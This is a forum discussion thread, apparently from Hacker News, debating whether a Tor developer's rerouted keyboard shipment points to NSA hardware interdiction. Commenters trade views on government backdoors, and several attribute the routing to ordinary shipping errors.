I was thinking of those silver foils that are now put over a lot of food items so that crazies can't put stuff in them in the supermarket. I appreciate wrapping it in plastic probably wouldn't be enough to defeat the security services, but you get the idea.
Why would the NSA fuck with a TOR developer, when the federal government contributes a great deal of TOR code and actually runs exit nodes as a matter of research?
Why wouldn't they? At the very least a TOR developer might find themselves in the same room with interesting people.
> when the federal government contributes a great deal of TOR code
The US gov isn't a single monolithic entity with a singular purpose and every person working in lock-step.
> and actually runs exit nodes as a matter of research?
I wouldn't trust a gov't run TOR node. It may be fine for dissidents in uninteresting countries, but not for anyone who wants to keep their privacy safe from the US gov't.
Bugs in software are so uncommon these days that I always assume any malfunctions are due to government interference. A human making a mistake while programming or using a computer? Not bloody likely. The government trying to infect my laptop with malware contained in a replacement keyboard? That's the only possible explanation!
Some OS developers are sufficiently concerned that CPUs are NSA-modified to not trust, say, Intel's rdrand instruction anymore!
It may very well be that every single Linux system running on a recent or semi-recent CPU has a rdrand instruction returning a number "nullifying" (from the NSA's point of view) the previous entropy sources XOR'ing.
You may call me "paranoid" but... Many people who were categorized as paranoids years ago turned out actually to be very, very far from the truth and not anywhere near paranoid enough.
I also remember a SNAFU years ago where a Windows version was compiled with some symbols left on and people started noticing variables named things like: "NSA_KEY". And, of course, lots of PR ensued and there was nothing to see and there were very reasonable explanations as to why there were NSA specific things in Windows.
Contrary to you I believe it is very likely that most Windows and Apple OSes are backdoored by the NSA and I believe it's far from impossible that several pieces of hardware are also backdoored.
I also think it's not impossible that several network cards have "kill switches" where a certain packet combination bricks the card. There have been weird reports out there from people seeing really strange things making such a possibility not science-fiction.
Every PC comes with malware already installed by most manufacturers. (Yes, if I have to spend time removing bloated stuff it's malware, I don't care if it's an "antivirus demo" or something like that)
Now, if it's a hardware detail, this is more interesting.
Not all malware can be removed the way you remove that antivirus demo. From the Der Spiegel article[1]:
> Take, for example, when they intercept shipping deliveries. If a target person, agency or company orders a new computer or related accessories, for example, TAO can divert the shipping delivery to its own secret workshops. The NSA calls this method interdiction. At these so-called "load stations," agents carefully open the package in order to load malware onto the electronics, or even install hardware components that can provide backdoor access for the intelligence agencies. All subsequent steps can then be conducted from the comfort of a remote computer.
Naturally, if they also load a keyboard logger or whatever, no amount of formatting that new laptop would help.
What about changing your BIOS to intercept keystrokes? Or hacking the hard drive firmware, so they would have the master key for your encrypted disk next time you cross the border? A lot more effective than any other software-based solution.
A few years ago we'd say this is all crazy conspiracy theory. Nowadays this is just NSA's business as usual tactics [1].
Really stupid move to post this on twitter before getting it. Should have just taken a screenshot then waited for it to show up. Then post the screenshot and have people analyze the keyboard.
By posting before getting the package, the NSA could see the Twitter post and give a non-modified one instead.
I wonder what she's going to do with the keyboard when she gets it. Send it back and buy one locally? Examine it in detail for bugs/weirdness, and then use it normally? Connect it to a spare laptop, and use it to do searches for the weirdest porn you can think of?
Isn't it obvious this is some kind of weird reverse-psychology? They can always call catch 22, or they need not to, we can only guess. But it's kind of obvious this happened to dismiss the fact they ARE doing this on a regular basis.
Nonsense. Every single piece on those laptops already leaks more than a teabag, every protocol does more information broadcasting than the BBC, why would they have it shipped to the headquarters?
NSA's job is to bug computers before they even enter Amazon.
The reason we're discussing this, is because of the laptop's/keyboard's owner: A TOR developer. If this was uncle Joe no one would even care, because probably his Facebook data is all that matters anyway.
I live in Ashburn, VA. I've had a package routed through Ashburn, GA. Someone got confused between Washington(the state) and Washington(DC)...? Occam's razor people...
fwiw I recently had a large, professional shipment company state that my product had been delivered to the new town over, albeit to the same street address I had ordered it to.
The product was in my PO box, but the shipping company claimed it was delivered to another adjacent town.
Never attribute to malice that which is adequately explained by stupidity.
A few months ago, I ordered some RAM from Crucial. They used UPS Mail Innovation, a service by UPS that mails packages for you. I got my package, but the tracker showed it getting delivered to another address on the other side of the country. So maybe there's a bug somewhere in the USPS system that shows you the tracking of the wrong package?